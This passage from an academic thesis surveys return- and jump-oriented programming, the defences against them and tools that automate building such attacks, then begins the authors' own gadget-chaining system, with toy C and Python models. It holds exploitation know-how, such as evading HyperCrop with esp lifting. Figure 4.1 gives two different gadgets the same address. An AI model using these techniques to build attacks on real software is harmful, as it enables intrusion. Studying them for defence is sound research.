As mentioned before, ROP as a concept can be realized in many ways and applied to different architectures. Return oriented programming without returns [34], introduced on the x86 and ARM architectures, is another method to implement ROP attacks. Instead of looking for gadgets ending in a return instruction, this method focuses on gadgets ending in return-like instruction sequences of the form “pop reg; jmp reg” on the x86 architecture, and in the update-load-branch return-like sequence on the ARM architecture. Many other equivalent instruction sequences are also considered, such as gadgets ending in an indirect jump instruction: combined with even a single update-load-branch sequence, they make it possible to build a reusable trampoline that transfers the control flow of the attack to the next gadget. The authors show that in sufficiently large libraries, such as libc, it is possible to build a gadget set with Turing-complete functionality and thus to construct arbitrary attacks.
Figure 2.3: Jump Oriented Programming. The same five gadgets as in Figure 2.1 (at 0x00555A08, 0x00212508, 0x00ABCD00, 0x00777700 and 0x00919100), each now ending in JMP instead of RETURN, are sequenced by a dispatcher.
Jump-oriented programming (JOP) is another variation of return oriented programming that has also been proven Turing-complete. The approach eliminates the reliance on the stack and on return instructions seen in return-oriented programming. Unlike ROP, where the control flow returns to the stack after the execution of a gadget in order to follow the next address, JOP performs a unidirectional control-flow transfer to its target. Instead of ending in a return instruction, each gadget in a JOP attack ends in a jmp instruction. The attack relies on a dispatcher gadget, which essentially maintains a virtual program counter and uses it to advance from one gadget to the next, as illustrated in Figure 2.3.
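The role of the dispatcher can be illustrated with a toy model in C. All names are hypothetical. Ordinary C functions stand in for gadgets, and a C function return stands in for the jmp that ends each gadget and hands control back to the dispatcher.

```c
#include <assert.h>
#include <stddef.h>

/* Toy state shared by the gadgets. */
struct jop_state {
    int eax;
    int ebx;
};

typedef void (*gadget_fn)(struct jop_state *);

static void load_two(struct jop_state *s)  { s->eax = 2; }
static void load_five(struct jop_state *s) { s->ebx = 5; }
static void add_regs(struct jop_state *s)  { s->eax += s->ebx; }

/*
 * Stands in for the dispatcher gadget: pc plays the role of the virtual
 * program counter that selects the next entry of the dispatch table.
 */
static void dispatch(const gadget_fn *table, size_t count, struct jop_state *s)
{
    assert(table != NULL && s != NULL);
    for (size_t pc = 0; pc < count; pc++)
        table[pc](s);
}
```

Dispatching the table { load_two, load_five, add_regs } leaves 7 in eax. In a real attack the table would hold gadget addresses in attacker-controlled memory, and the dispatcher would itself be a short instruction sequence found in the target.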
2.3 Architectural aspects
That return oriented programming represents a universal threat is illustrated by the fact that ROP attacks are not limited to architectures with variable-length instructions such as x86. RISC architectures such as SPARC share almost no properties with the x86 architecture. Since SPARC has fixed-width instructions and enforces alignment on instruction fetch, unintended instructions can no longer be used when crafting return oriented attacks, which significantly reduces the set of available gadgets. However, stack overflows are still possible on SPARC, and the rich register set, combined with the 4000 return instructions in the Solaris libc implementation, was shown to be enough to create ROP attacks [2].
Similarly to the SPARC architecture, the thread of ROP has also been extended to
support another RISC architecture, namely ARM [3], affecting many smart-phones
and mobile and embedded devices. Although the implementation and the focus
of this work was on Windows Mobile, the technique can be ported on any other
operating system based on the architecture. The real-world use case of ROP has also
been depicted when AVC Advantage Harvard machines were shown to be exploitable
[6], which were used as a voting machines for elections in United States in the past.
Other affected architectures are also Atmel AVR [4] and Power PC [5].
2.4 Defence Techniques
The discovery of the first buffer overflow attacks created the need for adequate
protection mechanisms to address the potential vulnerabilities. As the sophistication
of the attacks increased, many techniques were developed to mitigate code reuse
attacks. Against strong adversaries, the effectiveness of those systems can still be
challenged, showing that ROP and its variations remain a valid threat, especially in
environments where those systems are not deployed.
2.4.1 W⊕X and ASLR
Stack smashing attacks, when initially discovered, were quite popular, as the
exploitation of those vulnerabilities was quite simple. As soon as the attacker was
able to change the return address on the stack, it was also possible to inject
arbitrary machine code on the stack and direct the machine to execute the injected
code. To address this issue, the “W⊕X” protection model emerged, marking memory
regions as writeable or executable, but never both. The model therefore prevented
attackers from running injected code, as diverting the control flow of the program to
it would cause a processor exception. Being a sufficiently strong mitigation, the
model was soon adopted by CPU manufacturers under the name NX bit (No eXecute) and was
incorporated in many modern operating systems. Intel introduced the XD bit, AMD the
Enhanced Virus Protection, and ARM the XN bit. Microsoft implemented Data Execution
Prevention (DEP) [38], supporting software and hardware based data protection. Linux
adopted PaX [7] to utilize the NX bit, as well as to emulate it on architectures
where it was not supported. Red Hat introduced ExecShield [9]. Mac OS X, FreeBSD,
OpenBSD, NetBSD, Solaris and Android also incorporated the protection mechanism
in their implementations.
W⊕X as a protection model was only able to provide security until code reuse attacks
appeared. To mitigate the new approaches, address space layout randomization (ASLR)
[8] was introduced. The model enforces a random arrangement of libraries, heap and
stack space within the process address space. The random offsets of the dynamic
libraries, as well as of the heap and stack space, hinder the creation of ROP attacks,
especially return-to-libc attacks, by making it harder to predict the position of the
gadgets used in the attacks. Similarly to W⊕X, ASLR was incorporated as part of PaX in
Linux and OpenBSD, Microsoft included an implementation in DEP, followed by Mac OS X,
iOS and Android. Although ASLR appears to be a very strong mitigation against code
reuse attacks, it was later demonstrated that it can be bypassed by a derandomization
attack [39], which converts any standard buffer overflow attack into one that affects
systems where ASLR is enabled. The derandomization attack exploited the fact that ASLR
does not randomize the stack layout, and used brute force to pinpoint the location of
libc. Considering that it took only 216 seconds to compromise Apache, a
derandomization attack can also be used to locate the positions of gadgets in order to
initiate a ROP attack.
2.4.2 Return-Less Kernels
Building an operating system with a return-less kernel was an attempt to remove the
threat of return oriented attacks designed to escalate access privileges in the
operating system [10]. The authors used a compiler based approach to generate a
FreeBSD kernel without return instructions and without return opcodes. Instead of
using the traditional calling convention where the return address is pushed on the
stack, a return index is pushed on the stack. This index refers to an entry in a
centralized return address table, containing all valid return addresses permitted in
the kernel. Once a return is invoked, the return index is popped from the stack, and
the control flow of the program is transferred to the corresponding return address. As
there is a finite number of call instructions within the kernel implementation, the
return address table is static, and therefore it can be pre-generated according to the
locations of the call instructions.
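The return-index mechanism described above can be illustrated with a small model. This is only a sketch under stated assumptions: the table contents, the function names do_call and do_return, and the Python list standing in for the stack are all hypothetical and are not taken from the return-less kernel implementation.

```python
# Hypothetical model of a return-index calling convention.
# RETURN_TABLE stands in for the static, pre-generated table of valid
# return addresses; its contents are made up for illustration.
RETURN_TABLE = [0x1000, 0x1040, 0x10A8]


def do_call(stack, return_index):
    """Model of a call: push a return index instead of a return address."""
    stack.append(return_index)


def do_return(stack):
    """Model of a return: pop the index and resolve it through the table."""
    index = stack.pop()
    if not 0 <= index < len(RETURN_TABLE):
        raise ValueError("invalid return index")
    return RETURN_TABLE[index]


stack = []
do_call(stack, 1)
target = do_return(stack)  # resolves to RETURN_TABLE[1]

# A raw address written by an attacker is not a valid table index.
stack.append(0x080484F3)
try:
    do_return(stack)
    rejected = False
except ValueError:
    rejected = True
```

In this model an attacker can still choose among the valid table entries, but can no longer direct a return to an arbitrary gadget address.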
The implementation of the approach systematically replaces each call and return
instruction with code that pushes a return index on the stack and looks up the
corresponding entry in the return address table, effectively removing all return
instructions from the kernel. However, the control flow of the kernel is now
transferred using jmp instructions, resulting in an increased number of jmp
instructions in the kernel binary. As the approach does not ensure resilience against
jump oriented attacks, the increased number of jmp instructions enriches the set of
JOP gadgets, providing additional opportunities to JOP attackers. Although this system
defeats the return oriented rootkits known at that time, it does not provide foolproof
and generic protection against all variations of ROP attacks.
2.4.3 HyperCrop
HyperCrop [11] is a hypervisor, i.e. Virtual Machine Manager (VMM), based approach to
defeat x86 return oriented programming attacks, built on top of the Xen hypervisor
[40]. In this context the VMM is used to intercept stack writes that occur during
program execution, and to inspect the content of the stack to detect the threat of a
ROP attack. In the initial step, gadget addresses are extracted from the binary /
library that is protected by the system. These addresses form the set of gadget
addresses that could potentially be used by an attacker in a ROP scenario. During the
execution of the program, 400 bytes are copied from the top of the stack, which
correspond to 100 32-bit entries on the stack. Finally, each of the 100 entries is
cross-referenced against the predefined set of potential gadget addresses. If the
ratio of the number of entries that belong to the set of potential gadget addresses
to the total number of entries is above a carefully chosen threshold, then the system
assumes the potential threat of a ROP attack.
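The ratio heuristic can be sketched in a few lines. The gadget addresses, the stack contents and the threshold value of 0.3 below are assumptions chosen purely for illustration; the function names are hypothetical as well.

```python
def gadget_ratio(stack_words, gadget_addresses):
    """Fraction of stack entries that are known potential gadget addresses."""
    if not stack_words:
        return 0.0
    hits = sum(1 for word in stack_words if word in gadget_addresses)
    return hits / len(stack_words)


def looks_like_rop(stack_words, gadget_addresses, threshold):
    """Flag the stack snapshot when the ratio exceeds the threshold."""
    return gadget_ratio(stack_words, gadget_addresses) > threshold


# Hypothetical set of potential gadget addresses extracted ahead of time.
GADGETS = {0x08048100, 0x08048200, 0x08048300}
THRESHOLD = 0.3  # assumed value, would be tuned per program / library

# 100 entries (400 bytes) copied from the top of the stack.
benign_stack = [0x08048100, 0x08048200] + [0xBFFF0000 + 4 * i for i in range(98)]
rop_stack = [0x08048100, 0x08048200, 0x08048300] * 20 + [0x41414141] * 40

benign_flagged = looks_like_rop(benign_stack, GADGETS, THRESHOLD)
rop_flagged = looks_like_rop(rop_stack, GADGETS, THRESHOLD)
```

Here the benign snapshot has a ratio of 0.02 and the ROP-like snapshot a ratio of 0.6, so only the latter is flagged.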
The analysis of the system reported a performance overhead of 1.4, suggesting that
the system is practical to use to defend against ROP attacks. However, the approach
has several limitations. As the binary size of different programs / libraries varies
according to their code base, the threshold used as a heuristic to determine the
potential of a ROP attack must be calculated and normalized for each individual
program / library. Furthermore, each time a program / library is updated and
recompiled, the set of potential gadget addresses must be updated, and, as the
cardinality of the set of potential gadgets can change, the threshold must be
recalculated. This makes the system tedious to use and infeasible for deployment on a
large scale.
The second problem is the heuristic based on a pre-determined threshold. As the system
only analyses 100 entries from the stack, an attacker can use the so called esp
lifting technique [31] to increase the value of esp with a single gadget. A single
increment of esp leads to the execution of the next gadget available on the stack in a
ROP attack. If esp is instead increased by a particular value x, then the CPU will
execute the gadget whose address resides at stack position esp+x. This technique
effectively jumps over parts of the stack, creating holes that can be filled with
bogus values. If the attack is crafted such that those bogus values do not correspond
to gadget addresses, the ratio of potential gadget addresses to total entries in the
stack can be reduced below the value of the threshold, bypassing the HyperCrop
detection.
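The effect of esp lifting on the ratio can be shown with simple arithmetic. The sketch below assumes a hypothetical payload layout in which every useful gadget address is followed by the address of an esp-lifting gadget and a run of bogus padding words; the layout and the function name are illustrative assumptions, not a description of a concrete attack.

```python
WINDOW = 100  # number of 32-bit stack entries inspected


def window_ratio(padding_words):
    """Ratio of gadget addresses in the window for a repeating payload
    pattern: one useful gadget, one esp-lifting gadget, then padding."""
    pattern = ["gadget", "lift"] + ["bogus"] * padding_words
    window = [pattern[i % len(pattern)] for i in range(WINDOW)]
    hits = sum(1 for word in window if word != "bogus")
    return hits / WINDOW


dense = window_ratio(0)    # no padding: every entry is a gadget address
diluted = window_ratio(8)  # each lift skips 8 bogus words (32 bytes)
```

With eight padding words per lift the ratio drops from 1.0 to 0.2, so a detector with any threshold above 0.2 would no longer flag the payload.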
Finally, HyperCrop is defenceless against jump oriented programming attacks, since
these types of attacks do not rely on stack values to retain control flow.
2.4.4 ROPdefender
ROPdefender [12] is a neat technique able to defend against traditional ROP attacks
using a binary instrumentation framework [41]. The implementation of this approach is
built on top of Pin, utilizing its VM emulation unit and just-in-time compiler unit to
build a shadow stack, similar to the one used in StackGhost [42]. When a call or
return instruction occurs, ROPdefender uses the inspection routines provided by Pin to
intercept the instruction. Once a call is encountered, the return address is pushed on
the shadow stack. When a return instruction occurs, the return address the stack
pointer points to (i.e., the return address on the program stack) is compared with the
saved return address on top of the shadow stack. If the values do not match, then a
ROP attack is detected.
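The shadow stack check can be modelled as follows. This is a minimal sketch that does not use Pin; the class name, the method names on_call and on_return, and the example addresses are hypothetical.

```python
class ShadowStack:
    """Keeps a private copy of return addresses, separate from program data."""

    def __init__(self):
        self._saved = []

    def on_call(self, return_address):
        # Invoked when a call instruction is intercepted.
        self._saved.append(return_address)

    def on_return(self, return_address):
        # Invoked when a return instruction is intercepted.
        # Returns True if the return is legitimate, False if it is suspicious.
        if not self._saved:
            return False
        return self._saved.pop() == return_address


shadow = ShadowStack()

# Legitimate nested calls: returns happen in reverse order of the calls.
shadow.on_call(0x08048010)
shadow.on_call(0x08048020)
inner_ok = shadow.on_return(0x08048020)
outer_ok = shadow.on_return(0x08048010)

# Overwritten return address: the program stack no longer matches the copy.
shadow.on_call(0x08048030)
attack_ok = shadow.on_return(0x080484F3)
```

Because every gadget in a ROP chain ends in a return that has no matching call, the first gadget already fails the comparison in this model.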
Since the fundamental circumstance that makes return oriented programming possible is
that return addresses are written on the same stack where arbitrary data is placed,
keeping a copy of the return addresses in a shadow stack is quite an elegant solution
to avoid ROP attacks. However, the greatest drawback of ROPdefender is the performance
overhead, which in the worst case introduces a 3.54 times slowdown when compared to
normal execution of a program. Although most of it is a consequence of the performance
overhead of Pin, the only feasible deployment scenario on a large scale would be an
implementation of the ROPdefender logic at the hardware level. Still, similarly to the
HyperCrop model, ROPdefender does not provide a mechanism to defend against ROP
attacks based on indirect jumps. Since indirect jumps do not disrupt the calling
sequence inside a running program, the shadow-stack verification of return addresses
is futile.
2.4.5 G-Free
G-Free [13] is another system that aims to address a wide range of common code reuse
attacks. It focuses on securing the libc library to prevent return-into-libc attacks,
by preventing the attacker from reusing existing fragments of code as basic building
blocks. The protection addresses both intended and unintended instructions. The
protection for the latter is achieved using code rewriting techniques that remove
unintended instructions by aligning instructions using an alignment sled,
a sufficiently large instruction sequence that has no effect once executed. Combined
with the removal of occurrences of the c3 and c2 bytes, the system reduces the number
of unintended gadgets in libc. To protect the intended instructions from being
reused as gadgets, the system incorporates return address protection, by introducing
a header of instructions that encrypts the return address pushed on the stack and a
footer of instructions that decrypts the return address before the return instruction
occurs.
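The idea behind the header and footer can be sketched with a toy model. The text above does not specify the cipher, so the XOR with a random per-run key used here is an assumption made for illustration only, as are the function names and addresses.

```python
import secrets

MASK32 = 0xFFFFFFFF


def header_encrypt(return_address, key):
    """Function entry: replace the return address with its encrypted form.
    XOR is an assumed stand-in for the actual encryption."""
    return (return_address ^ key) & MASK32


def footer_decrypt(stored_value, key):
    """Function exit: decrypt whatever is stored before returning to it."""
    return (stored_value ^ key) & MASK32


key = secrets.randbits(32) | 1  # forced non-zero so the demo is deterministic

# Normal execution: header and footer both run, the address is restored.
legit = 0x08048ABC
restored = footer_decrypt(header_encrypt(legit, key), key)

# Gadget reuse: the attacker jumps past the header, so the footer decrypts
# a plain injected address and the return goes to an unintended location.
injected = 0x080484F3
hijacked_target = footer_decrypt(injected, key)
```

In this model an attacker who does not know the key cannot make the footer produce a chosen gadget address, which is what prevents the function tail from being used as a gadget.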
The system also provides protection against indirect jumps and demonstrates solid
protection against traditional ROP and all its variations, with a very small
performance overhead of about 5.6% in the worst case. Nevertheless, it is quite
difficult to judge how the system performs on intensive benchmarks, since the
performance evaluation addressed use cases where control flow was not the most crucial
part (IO-bound and kernel based workloads). Although G-Free provides a comprehensive
solution to defend against ROP attacks, it has been demonstrated only as a prototype,
furnishing ROP protection within the implementation of libc. The low deployment of
the principle across software on different architectures, operating systems and
end-user applications leaves the threat of ROP at the heart of security problems.
2.4.6 Control Flow Integrity
Control Flow Integrity [14] is a code rewriting technique that incorporates lightweight
static verification and instruments runtime checks to prevent code reuse attacks. As
changing the control flow of the program is the essence of ROP based exploits, this
technique ensures that a program follows its control flow graph (CFG), generated ahead
of time. The implementation is based on a modified XFI [43], to support so-called
individual label instructions that indicate the beginning of a particular function
without affecting its semantics (prefetch instruction). During the execution of a
program, the system checks whether the labels point to a valid branch instruction,
and when a function returns the system also checks whether the pointer points to a
valid return address, constraining the binary to follow an expected control flow.
The rewriting engine of XFI analyses the binary and finds all branching instructions.
According to this analysis, the system performs the code rewriting, instrumenting the
branching instructions to enforce the CFG program flow. Unfortunately, a drawback of
the binary analysis is that this system addresses intended instructions only. A ROP
attack crafted with gadgets consisting of unintended instructions eliminates the
ability to verify that a return address points to a valid label instruction.
Furthermore, the performance overhead introduced by this system (∼45% in the worst
case) is an additional reason why this system has not seen any
significant production deployment.
A follow-up work sharing the same fundamentals as CFI is the control flow locking
(CFL) system [15]. Unintended instructions are removed using an already existing
technique, software fault isolation [44]. Instead of introducing label instructions to
detect a control flow violation before it occurs, CFL lazily detects the violation
after the transfer occurs. This is done by performing a lock operation before each
indirect control flow transfer, with a corresponding unlock operation present at valid
destinations in binaries and static libraries. The work presented in this system fills
in the gaps left by the initial work on CFI. The low performance overhead (∼23% in
the worst case) is competitive with other defence mechanisms dealing with code reuse
attacks. Although the technique can be easily ported to support dynamically linked
libraries, giving the opportunity to defend against code reuse attacks, the low
deployment of the system keeps ROP attacks plausible.
3 Related Work
Section 2.4 gives an overview of the available defence techniques against ROP attacks,
their flaws and deployment rate, and clearly shows that return oriented programming is
a crowded, important research area. It also demonstrates the inability to provide an
extensive defence mechanism against all ROP attacks, as the mechanisms developed
along the way were only piecemeal defences addressing each new variant of code reuse
attack as it occurred.
On the other hand, the evolution of defence techniques also continuously prompted new
attack techniques to defeat the widely deployed security systems. As a result, the
attacks were becoming increasingly sophisticated, and harder to create. At the same
time, the variety of architectures, operating systems, distributions and applications
was an additional incentive for attackers to develop tools to automate the creation of
code reuse attacks, enabling them to target wide groups of users on different systems.
Recent work on ROP attacks clearly sheds light on the danger posed by these attacks.
Apart from defeating defence techniques, attackers also used tricks and methods to
disguise the generated attacks, by creating polymorphic variants, packed payloads, and
even ASCII printable payloads [36] to evade non-ASCII filtering. In the following
sections we describe the current tools and methods to automatically create ROP attacks
that are portable across different systems and architectures. As attackers can
potentially come up with an unlimited number of different ideas, we only address the
techniques known in the academic world.
3.1 Q
Q proposes software verification techniques to automatically create ROP attacks [16].
The system is also able to harden existing exploits. In this context, hardening denotes
the process of rewriting the logic of an exploit to bypass W⊕X and ASLR, assuming
that the exploit is unusable when those defences are enforced. We concentrate on the
automatic generation of ROP attacks. A Q exploit is constructed in several stages:
1. Gadget Discovery. This stage locates gadgets that match a predefined table of
gadget types: performing arbitrary binary operations, accessing memory, branching,
arithmetic operations, and moving data from one register to another. Q requires the
gadgets to have known side effects, a constant stack offset, and the ability to
transfer execution control to the next gadget. For each gadget the weakest
precondition and strongest postcondition are specified. Then the gadget is
semantically checked to determine whether it matches one of the predefined gadget
types.
2. Gadget Arrangement. In this stage, instruction selection is performed, in order
to implement a given computation. Having many ways of combining gadgets to
produce a particular computation, the instruction combination in this context
is represented by different gadget arrangements.
3. Gadget Assignment. Once different gadget arrangements are considered, Q
determines if a gadget arrangement can be satisfied. The algorithm in this
context iterates through possible arrangements and schedules, to verify whether
the arrangement satisfies the desired computation.
4. Gadget Output. Once gadget arrangements are found to have satisfiable assign-
ments, Q prints the bytes of the payload.
The produced attack is able to either call a function that resides in the target
binary, call an external function in libc, or write four bytes to an arbitrary
address. Results showed that Q is able to generate exploits for more than 80% of the
binaries located in /usr/bin/ that have a size of at least 20KB. Despite the good
results in exploit creation, Q has rather practical goals, involving the generation of
traditional ROP exploits, as it provides the features to execute internal and external
functions. Traditional ROP exploits involve calling a function such as system to
launch a shell, or calling mprotect to disable W⊕X and proceed with an exploit
containing executable machine code. Therefore the success and complexity of a Q
generated exploit relies on the existing internal and external functions. Q is unable
to generate higher level attacks, as its goals do not involve generating a Turing
complete set of instructions.
3.2 Return Into libc Attacks
On the Expressiveness of Return-into-libc Attacks (RILC) [17] is a splendid
demonstration of the Turing completeness (TC) of return-into-libc attacks. It builds
on a decade of using RILC in creating code reuse attacks, overturning the general
misconception that RILC attacks are not Turing complete. Without focusing in depth on
the implementation, the research work concentrates on combining functions from libc
so that RILC provides:
• General arithmetic and logic operations
• Memory accesses
• Branching
• System calls
Each of the RILC functionalities mentioned above is implemented with POSIX compliant
functions available across different operating systems. It also takes into account
other functions present in mostly POSIX compliant environments (such as Windows). To
demonstrate Turing completeness, the system builds a Turing machine simulator on
Debian and Windows XP. Although the ROP attacks using this approach are still built
manually, the well defined POSIX standard in the C library, with its consistent
interface, allows attacks that require only minor modifications (changing the function
offsets) to be ported across operating systems. Furthermore, as many applications
depend on the standard interface of libc, it is quite difficult to simply remove any
part of libc, or even to modify the interface.
However, in comparison with standard ROP attacks this approach has certain
disadvantages. Namely, the ROP payloads defined by RILC are significantly larger, due
to the many function calls. Furthermore, the efficiency of the payload is also
significantly reduced. The comparison of a simple Turing machine simulator built in C
with its TC-RILC ROP counterpart yields results where TC-RILC is 2000 times slower.
Finally, this technique does not apply to operating systems where libc is missing, or
to applications where libc is not used.
3.3 Reverse Engineering Intermediate Language
Reverse Engineering Intermediate Language (REIL) [18] is a framework that provides
automatic gadget search across different CPU architectures. The gadget search is
implemented such that the system searches for pre-determined instruction templates
(REIL representation). Each of the instruction templates is specified manually, and
the gadget search algorithm finds a single gadget performing the operation specified
by the template. Similarly to the RILC work, the templates are defined such that
the operations cover arithmetic, logical and bitwise operations and data transfer
instructions. The aim of the REIL framework is to ensure Turing completeness, by
finding sufficient gadget instructions to implement the ultimate reduced instruction
set computer (URISC) [45]. It operates in three stages:
1. Stage I uses a similar approach to the Galileo algorithm to extract gadgets. Once
a gadget is found, its REIL representation is determined according to the
predefined templates.
2. Stage II analyses the extracted gadgets and gathers information on the effects
induced by executing the instructions occurring in each gadget. This information
is represented by generating expression trees for the semantics of the gadget.
3. Stage III performs the gadget search. All potential gadgets obtained from the
previous stages are organized as expression trees. A core search algorithm
compares the expression trees of every potential gadget to expression trees that
reflect a particular operation. If all conditions are met for a potential gadget,
then the gadget is included in a list of specific gadgets. Finally, the complexity of
the gadget is calculated. This last process is twofold. In the first step it analyses
the registers and memory locations affected by the use of the gadget. In the
second step it analyses the complexity of the gadget by counting the nodes of the
expression trees of the gadget. The second analysis minimizes the complexity
of the instructions used to satisfy a particular operation.
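The matching and complexity steps of Stage III can be sketched with nested tuples as expression trees. The tree encoding, the "?" wildcard, and the candidate gadgets below are illustrative assumptions and do not reflect the actual REIL data structures.

```python
def matches(tree, template):
    """True if the tree has the shape of the template; "?" matches anything."""
    if template == "?":
        return True
    if isinstance(tree, tuple) and isinstance(template, tuple):
        return (
            len(tree) == len(template)
            and tree[0] == template[0]
            and all(matches(t, p) for t, p in zip(tree[1:], template[1:]))
        )
    return tree == template


def count_nodes(tree):
    """Complexity measure: number of nodes in the expression tree."""
    if not isinstance(tree, tuple):
        return 1
    return 1 + sum(count_nodes(child) for child in tree[1:])


# Template for "some addition of two operands".
ADD_TEMPLATE = ("add", "?", "?")

# Hypothetical candidates: (gadget address, expression tree of its effect).
candidates = [
    (0x1000, ("add", ("mul", "eax", "2"), "ebx")),
    (0x2000, ("add", "eax", "ebx")),
    (0x3000, ("xor", "eax", "ebx")),
]

matching = [(addr, tree) for addr, tree in candidates if matches(tree, ADD_TEMPLATE)]
best_addr, best_tree = min(matching, key=lambda item: count_nodes(item[1]))
```

Two candidates match the addition template, and the one at 0x2000 is preferred because its tree has three nodes instead of five.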
The framework provides an extensive gadget search that takes architecture dependent
characteristics into consideration, making it available across ARM, SPARC, PowerPC and
MIPS architectures. It also successfully builds Turing complete sets of operations
on Windows Mobile, iOS and Symbian, using common libraries such as coredll, libsystem
and euser. However, this system heavily depends on the presence of common libraries.
Similar to the RILC model, this technique ensures Turing completeness under the
assumption that common libraries are likely to have enough gadgets to match the
predefined template operations. Having REIL construct a ROP attack automatically would
require a much more extensive examination of the side effects inflicted by the use of
the gadgets.
3.4 Return Oriented Rootkits
Return-Oriented Rootkits: Bypassing Kernel Code Integrity Protection Mechanisms [19]
is the only related work that provides fully automatic generation of return oriented
attacks, targeting the Windows kernel. As the logic of the rootkit is implemented using
return oriented programming, we focus on the generation of the attack. The system
consists of three modules:
1. Constructor. This module proceeds in two steps. In the first step, it searches
for single instructions followed by a free branch instruction. The search focuses
on a predefined set of instructions, characterised as useful instructions. In
the second step, the constructor chains gadgets together to form structured
gadgets designed to perform basic operations (logical, arithmetic, control flow,
stack manipulation and bitwise operations). In order to find all the gadgets
necessary to perform an operation, as well as to control which registers are
modified when a particular gadget is used, a set of CPU registers is specified,
the working registers. Finally, the constructor merges gadgets whose instructions
operate on the working registers to perform a particular operation.
2. Compiler. This building block takes the gadgets provided by the constructor and
a higher level source code, and produces the attack payload. The source code is
written in a dedicated C-like language. In this stage, the compiler chains the
gadgets generated by the constructor to implement the semantics given in the
source code.
3. Loader. The output generated by the compiler is an exploit containing addresses
relative to the program image. The loader adjusts the offsets of the addresses,
and resolves them into absolute addresses.
The system has been shown to automatically generate exploits across different Windows
OS kernels, with a good runtime overhead of the exploits and rather small payloads.
However, this technique is by no means a comprehensive solution for automating ROP
attacks. The most considerable drawback is the search for single-instruction gadgets.
The binary code of a typical OS kernel is very likely to contain a huge set of
single-instruction gadgets as a result of its sheer size. Therefore, it is possible to
match all useful instructions defined in the context of this work. Nevertheless, this
convenience can only be expected in OS kernels and potentially in common libraries. On
the other hand, the binary code of some widely deployed applications does not provide
even the basic set of arithmetic, bitwise or logical single-instruction gadgets.
Closely looking at the
implementation details of the constructor, we note that the working register set is
restricted to three registers only, namely eax, ecx and edx. This significantly
reduces the flexibility of the gadget search and gadget chaining, as it is very hard to
find gadgets operating exclusively on the specified registers when the system is used
outside the OS kernel.
4 Automatic Return Oriented Programming
Chapter 3 gives an overview of the available techniques and approaches for the
automatic generation of code reuse attacks. Each of the techniques focuses on a set of
common libraries or operating system kernels. The convenience of building attack
techniques on the large chunks of machine code found in kernels and common libraries
is the resulting rich set of gadgets. Therefore, most of those techniques rely on
predefined sets of template instructions and registers and look for single-instruction
gadgets, assuming that the common library or operating system kernel is likely to have
all required gadgets. However, this approach does not apply to the reduced sets of
gadgets often found in small libraries and stand-alone executables.
Our focus in this work is on stand-alone executables. As previously discussed, the
traditional way of crafting a ROP attack is by invoking mprotect to disable the W⊕X
protection on the system and inject arbitrary code, or invoking execve to start a
remote shell on the target machine. Despite the fact that those functions are available
across different operating systems and distributions, a stand-alone binary does not
necessarily need to be linked against system libraries. Therefore exploiting a
vulnerability requires making use of the gadgets already available in the binary. To
make the best of the available gadgets, we observe:
1. If there is no gadget available that performs a particular logical or arithmetic
operation, we might be able to find a suitable substitution.
2. If there is no gadget and no substitution, then that particular operation will not
be available in the ROP attack.
3. If there are only a few gadgets available, then gadget chaining requires moving
data between registers, such that the result of one operation can be used as
an input to the next operation.
The first observation proposes that if a gadget having inc functionality is not
available in the system, it might be possible to substitute it with a gadget having
add functionality. However, if neither inc nor add functionality gadgets are available
in the executable, then this operation will be unavailable in the attack, according to
the second observation. To illustrate the third observation, we assume that an
executable is given that has the gadgets shown in Figure 4.1. We would like to use the
three gadgets to calculate:
edx = edx - ebp - ecx
0xb9268970: add ebp, ecx; ret
0x42295cee: sub eax, edx; inc [esi+0x5D5B]; ret
0x42295cee: mov ecx, eax; ret
Figure 4.1: Available gadgets
Although the simplest implementation of this calculation is using sub ebp, edx;
sub ecx, edx, those gadgets are not available in the system. Thus, the sum of ebp
and ecx is calculated first, and then the result is subtracted from edx. However, to do
this, we need to pass the result of the first computation as input to the next gadget
using a mov instruction gadget (Figure 4.2).
(1) 0xb9268970: add ebp, ecx; ret
(3) 0x42295cee: sub eax, edx; inc [esi+0x5D5B]; ret
(2) 0x42295cee: mov ecx, eax; ret
Figure 4.2: Simple gadget chaining (the numbers give the order of execution)
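The chain in Figure 4.2 can be checked with a small simulation. The sketch assumes that the gadgets use a (source, destination) operand order, as implied by the text (add ebp, ecx stores the sum in ecx), that the inc side effect operates on a 32-bit word, and that all register values are hypothetical.

```python
MASK32 = 0xFFFFFFFF


def add_ebp_ecx(state):
    # add ebp, ecx; ret  ->  ecx = ecx + ebp
    state["ecx"] = (state["ecx"] + state["ebp"]) & MASK32


def mov_ecx_eax(state):
    # mov ecx, eax; ret  ->  eax = ecx
    state["eax"] = state["ecx"]


def sub_eax_edx(state):
    # sub eax, edx; inc [esi+0x5D5B]; ret  ->  edx = edx - eax,
    # plus the side effect of incrementing a memory word (assumed 32-bit).
    state["edx"] = (state["edx"] - state["eax"]) & MASK32
    address = (state["esi"] + 0x5D5B) & MASK32
    state["mem"][address] = (state["mem"].get(address, 0) + 1) & MASK32


# Hypothetical initial register values.
state = {"eax": 7, "ecx": 20, "edx": 100, "ebp": 30, "esi": 0x1000, "mem": {}}
expected = (state["edx"] - state["ebp"] - state["ecx"]) & MASK32

# Execution order from Figure 4.2: add, then mov, then sub.
for gadget in (add_ebp_ecx, mov_ecx_eax, sub_eax_edx):
    gadget(state)
```

After the chain, edx holds the desired result, while eax and ecx are overwritten and the memory word at esi+0x5D5B is incremented; these are the side effects that a chaining tool has to track.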
There are eight 32-bit general purpose CPU registers. Bearing in mind that each
instruction with two operands can use any of the eight registers for each operand,
there are 64 possible register combinations for every computation (arithmetic,
logical, etc.). The number increases significantly when one of the operands is a
memory operand, taking into consideration the base register, displacement value etc.
To be able to chain as many gadgets as possible, we need to know the data transfer
relations between each of the registers in the system, as well as memory. These data
transfer relations also depend on the gadgets available in the target executable.
However, a reduced set of gadgets significantly reduces the number of
single-instruction gadgets, so gadgets of several instructions must be considered. In
turn, the use of multi-instruction gadgets can cause unwanted side effects, which must
be eliminated or taken into consideration.
In the following sections, we describe a system that automates the creation of ROP
attacks in stand-alone executables on the x86 architecture, using Linux as the
operating system. The system consists of several phases:
1. In the initial phase of the system, we disassemble the target executable and
extract the raw bytes of the available gadgets.
2. The next phase considers the side effects imposed by the gadgets, and classifies
the extracted gadgets according to their semantics.
3. We generate the register transfer graph to describe the data transfer relations
between the CPU registers and memory.
4. Finally, in the last phase, we use the register transfer graph to provide a
comprehensive method to perform gadget chaining.
Being aware of the interconnection between CPU registers, our system can introduce
flexibility in the set of CPU registers being used in the ROP attack, avoiding the
predefined sets of registers seen in other systems. In addition, the flexibility in
the register set will narrow the search for gadgets performing particular operations,
and contribute towards the automatic creation of ROP attacks by avoiding operation
templates.
4.1 Process Image Analysis
The first step towards automating the gadget search is extracting the machine code
